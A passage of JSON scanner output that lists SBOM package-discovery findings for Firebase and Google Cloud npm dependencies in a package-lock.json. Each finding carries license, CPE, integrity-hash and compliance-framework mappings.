"Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "89a01c3b3491a5d7", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @firebase/component 0.6.9", "title": "@firebase/component 0.6.9", "description": "Package discovered: @firebase/component 0.6.9", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "23f944b79804e251", "name": "@firebase/component", "version": "0.6.9", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@firebase\\/component:\\@firebase\\/component:0.6.9:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40firebase/component@0.6.9", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@firebase/component/-/component-0.6.9.tgz", "integrity": "sha512-gm8EUEJE/fEac86AvHn8Z/QW8BvR56TBw3hMW0O838J/1mThYQXAIQBgUv75EqlCZfdawpWLrKt1uXvp9ciK3Q==", "dependencies": { "@firebase/util": "1.10.0", "tslib": "^2.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ac38e7507aa172f9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @firebase/database 1.0.8", "title": "@firebase/database 1.0.8", "description": "Package discovered: @firebase/database 1.0.8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "49e5593cb4d5046f", "name": "@firebase/database", "version": "1.0.8", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database:1.0.8:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40firebase/database@1.0.8", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@firebase/database/-/database-1.0.8.tgz", "integrity": "sha512-dzXALZeBI1U5TXt6619cv0+tgEhJiwlUtQ55WNZY7vGAjv7Q1QioV969iYwt1AQQ0ovHnEW0YW9TiBfefLvErg==", "dependencies": { "@firebase/app-check-interop-types": "0.3.2", "@firebase/auth-interop-types": "0.2.3", "@firebase/component": "0.6.9", "@firebase/logger": "0.4.2", "@firebase/util": "1.10.0", "faye-websocket": "0.11.4", "tslib": "^2.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ed006e6af38f061f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @firebase/database-compat 1.0.8", "title": "@firebase/database-compat 1.0.8", "description": "Package discovered: @firebase/database-compat 1.0.8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2a2bae4730b1aafc", "name": "@firebase/database-compat", "version": "1.0.8", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@firebase\\/database-compat:\\@firebase\\/database-compat:1.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/database-compat:\\@firebase\\/database_compat:1.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/database_compat:\\@firebase\\/database-compat:1.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/database_compat:\\@firebase\\/database_compat:1.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database-compat:1.0.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database_compat:1.0.8:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40firebase/database-compat@1.0.8", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@firebase/database-compat/-/database-compat-1.0.8.tgz", "integrity": "sha512-OpeWZoPE3sGIRPBKYnW9wLad25RaWbGyk7fFQe4xnJQKRzlynWeFBSRRAoLE2Old01WXwskUiucNqUUVlFsceg==", "dependencies": { "@firebase/component": "0.6.9", "@firebase/database": "1.0.8", "@firebase/database-types": "1.0.5", "@firebase/logger": "0.4.2", "@firebase/util": "1.10.0", "tslib": "^2.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "04162de267eec152", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @firebase/database-types 1.0.5", "title": "@firebase/database-types 1.0.5", "description": "Package discovered: @firebase/database-types 1.0.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "67e400eb3f7a92f4", "name": "@firebase/database-types", "version": "1.0.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@firebase\\/database-types:\\@firebase\\/database-types:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/database-types:\\@firebase\\/database_types:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/database_types:\\@firebase\\/database-types:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/database_types:\\@firebase\\/database_types:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database-types:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database_types:1.0.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40firebase/database-types@1.0.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@firebase/database-types/-/database-types-1.0.5.tgz", "integrity": "sha512-fTlqCNwFYyq/C6W7AJ5OCuq5CeZuBEsEwptnVxlNPkWCo5cTTyukzAHRSO/jaQcItz33FfYrrFk1SJofcu2AaQ==", "dependencies": { "@firebase/app-types": "0.9.2", "@firebase/util": "1.10.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7028a090c3339aad", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @firebase/logger 0.4.2", "title": "@firebase/logger 0.4.2", "description": "Package discovered: @firebase/logger 0.4.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "fdb02e46c7ca0cd4", "name": "@firebase/logger", "version": "0.4.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@firebase\\/logger:\\@firebase\\/logger:0.4.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40firebase/logger@0.4.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@firebase/logger/-/logger-0.4.2.tgz", "integrity": "sha512-Q1VuA5M1Gjqrwom6I6NUU4lQXdo9IAQieXlujeHZWvRt1b7qQ0KwBaNAjgxG27jgF9/mUwsNmO8ptBCGVYhB0A==", "dependencies": { "tslib": "^2.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "98e9db7b5ca2c98a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @firebase/util 1.10.0", "title": "@firebase/util 1.10.0", "description": "Package discovered: @firebase/util 1.10.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6fc2f98e01b8bb45", "name": "@firebase/util", "version": "1.10.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:google:firebase\\/util:1.10.0:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/%40firebase/util@1.10.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@firebase/util/-/util-1.10.0.tgz", "integrity": "sha512-xKtx4A668icQqoANRxyDLBLz51TAbDP9KRfpbKGxiCAW346d0BeJe5vN6/hKxxmWwnZ0mautyv39JxviwwQMOQ==", "dependencies": { "tslib": "^2.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ac959c0aec00c93e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @google-cloud/firestore 7.11.6", "title": "@google-cloud/firestore 7.11.6", "description": "Package discovered: @google-cloud/firestore 7.11.6", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "352073d173d9984f", "name": "@google-cloud/firestore", "version": "7.11.6", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:google:cloud_firestore:7.11.6:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/%40google-cloud/firestore@7.11.6", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@google-cloud/firestore/-/firestore-7.11.6.tgz", "integrity": "sha512-EW/O8ktzwLfyWBOsNuhRoMi8lrC3clHM5LVFhGvO1HCsLozCOOXRAlHrYBoE6HL42Sc8yYMuCb2XqcnJ4OOEpw==", "dependencies": { "@opentelemetry/api": "^1.3.0", "fast-deep-equal": "^3.1.1", "functional-red-black-tree": "^1.0.1", "google-gax": "^4.3.3", "protobufjs": "^7.2.6" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f729f15026a15114", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @google-cloud/paginator 5.0.2", "title": "@google-cloud/paginator 5.0.2", "description": "Package discovered: @google-cloud/paginator 5.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e1f90862acd15bdd", "name": "@google-cloud/paginator", "version": "5.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@google-cloud\\/paginator:\\@google-cloud\\/paginator:5.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google-cloud\\/paginator:\\@google_cloud\\/paginator:5.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google_cloud\\/paginator:\\@google-cloud\\/paginator:5.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google_cloud\\/paginator:\\@google_cloud\\/paginator:5.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google:\\@google-cloud\\/paginator:5.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google:\\@google_cloud\\/paginator:5.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40google-cloud/paginator@5.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@google-cloud/paginator/-/paginator-5.0.2.tgz", "integrity": "sha512-DJS3s0OVH4zFDB1PzjxAsHqJT6sKVbRwwML0ZBP9PbU7Yebtu/7SWMRzvO2J3nUi9pRNITCfu4LJeooM2w4pjg==", "dependencies": { "arrify": "^2.0.0", "extend": "^3.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "13de8663f3cca980", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @google-cloud/projectify 4.0.0", "title": "@google-cloud/projectify 4.0.0", "description": "Package discovered: @google-cloud/projectify 4.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "aae37aa20c3046f6", "name": "@google-cloud/projectify", "version": "4.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@google-cloud\\/projectify:\\@google-cloud\\/projectify:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google-cloud\\/projectify:\\@google_cloud\\/projectify:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google_cloud\\/projectify:\\@google-cloud\\/projectify:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google_cloud\\/projectify:\\@google_cloud\\/projectify:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google:\\@google-cloud\\/projectify:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@google:\\@google_cloud\\/projectify:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40google-cloud/projectify@4.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@google-cloud/projectify/-/projectify-4.0.0.tgz", "integrity": "sha512-MmaX6HeSvyPbWGwFq7mXdo0uQZLGBYCwziiLIGq5JVX+/bdI3SAq6bP98trV5eTWfLuvsMcIC1YJOF2vfteLFA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": 